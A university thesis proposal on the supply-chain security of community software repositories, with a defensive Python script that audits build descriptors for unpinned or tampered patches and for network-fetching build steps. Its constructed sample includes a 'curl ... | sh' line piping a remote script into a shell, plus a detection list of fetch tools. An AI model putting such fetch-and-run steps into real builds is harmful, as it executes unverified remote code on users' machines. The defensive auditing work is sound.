Community-driven software repositories provide users with current software that is maintained by volunteers.
Most provide the following workflow:
- Acquire the tarball containing build descriptor and patches
- Download source or third party components
- Apply patches and build
- Download/display readme
- Install the resulting files
This process requires the users of the repository to trust (a) the build descriptor, (b) the downloaded files, (c) the patches, (d) the executed compilation commands and (e) the install procedure. As this workflow and the associated security model have several potential flaws, a tool-supported analysis of the largest community-driven software repositories provides a valuable contribution to the open source community.
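As an added illustration of trust points (b), (c) and (d), the following script audits a build descriptor before any patch is applied or any build command runs. It is example code written for this page, not a tool from the proposal or from any particular repository: the descriptor format (a dict with `sources`, `patches` and `build`), the package name `examplepkg`, the file contents and the list of "network-fetching" commands are all constructed assumptions. It rejects downloaded files and patches whose SHA-256 is missing, unpinned (`SKIP`) or wrong, and flags build commands that pull in content the descriptor never pinned.

```python
"""Audit a community build descriptor before patching and building.

Hypothetical minimal descriptor (constructed for this example, not any
real repository's format):
  sources: {filename: expected sha256 hex}
  patches: {filename: expected sha256 hex}
  build:   [shell command, ...]
"""
import hashlib
import shlex

# Tools that fetch content at build time, bypassing the pinned sources
# (trust point d: executed compilation commands). Constructed heuristic list.
NETWORK_TOOLS = {"curl", "wget", "git"}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_files(expected: dict, fetched: dict) -> list:
    """Return findings for artifacts whose hash is unpinned, missing or wrong."""
    findings = []
    for name, want in expected.items():
        if want in (None, "", "SKIP"):
            findings.append(f"{name}: checksum not pinned")
            continue
        data = fetched.get(name)
        if data is None:
            findings.append(f"{name}: not downloaded")
            continue
        got = sha256_hex(data)
        if got != want.lower():
            findings.append(f"{name}: sha256 mismatch (expected {want}, got {got})")
    return findings


def suspicious_build_commands(build: list) -> list:
    """Flag build steps that download unpinned content during compilation."""
    findings = []
    for cmd in build:
        tools = {tok for tok in shlex.split(cmd) if tok in NETWORK_TOOLS}
        if tools:
            findings.append(f"build step fetches content: {cmd!r} ({', '.join(sorted(tools))})")
    return findings


def audit(descriptor: dict, fetched: dict) -> list:
    """All findings for one descriptor; an empty list means safe to patch/build."""
    findings = []
    findings += verify_files(descriptor.get("sources", {}), fetched)
    findings += verify_files(descriptor.get("patches", {}), fetched)
    findings += suspicious_build_commands(descriptor.get("build", []))
    return findings


# Constructed sample input: stand-ins for a tarball and two patches.
SOURCE_TARBALL = b"constructed: not a real tarball"
PATCH_GOOD = b"constructed: --- a/Makefile\n+++ b/Makefile\n"
PATCH_TAMPERED = b"constructed: tampered patch contents"

DESCRIPTOR = {
    "name": "examplepkg",
    "sources": {"examplepkg-1.0.tar.gz": sha256_hex(SOURCE_TARBALL)},
    "patches": {"fix-build.patch": sha256_hex(PATCH_GOOD), "extra.patch": "SKIP"},
    "build": [
        "./configure --prefix=/usr",
        "make",
        "curl -s https://example.invalid/helper.sh | sh",
    ],
}

# What the client actually downloaded: the patch was swapped in transit.
FETCHED = {
    "examplepkg-1.0.tar.gz": SOURCE_TARBALL,
    "fix-build.patch": PATCH_TAMPERED,
    "extra.patch": b"constructed: unpinned patch",
}

if __name__ == "__main__":
    for finding in audit(DESCRIPTOR, FETCHED):
        print("REJECT:", finding)
```

The three findings printed for the constructed input correspond to the trust points in the text: a patch whose content differs from its pinned hash, a patch with no hash at all, and a build step that executes remote content the descriptor never pinned. A real client would stop before "Apply patches and build" when the list is non-empty.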
- Investigation of distribution methods of community-driven software repositories
- Investigation of threat-scenarios
- Investigation of mitigation techniques
- Implementation of analysis / mitigation tool
- Automated analysis of repository
This project can either be tackled as a Bachelor Thesis (up to 2 students) or as a Master Thesis (1 student) – The implementation/research focus depends on team size and personal interest of the student(s).
Contact: firstname.lastname@example.org http://csillaber.q-e.at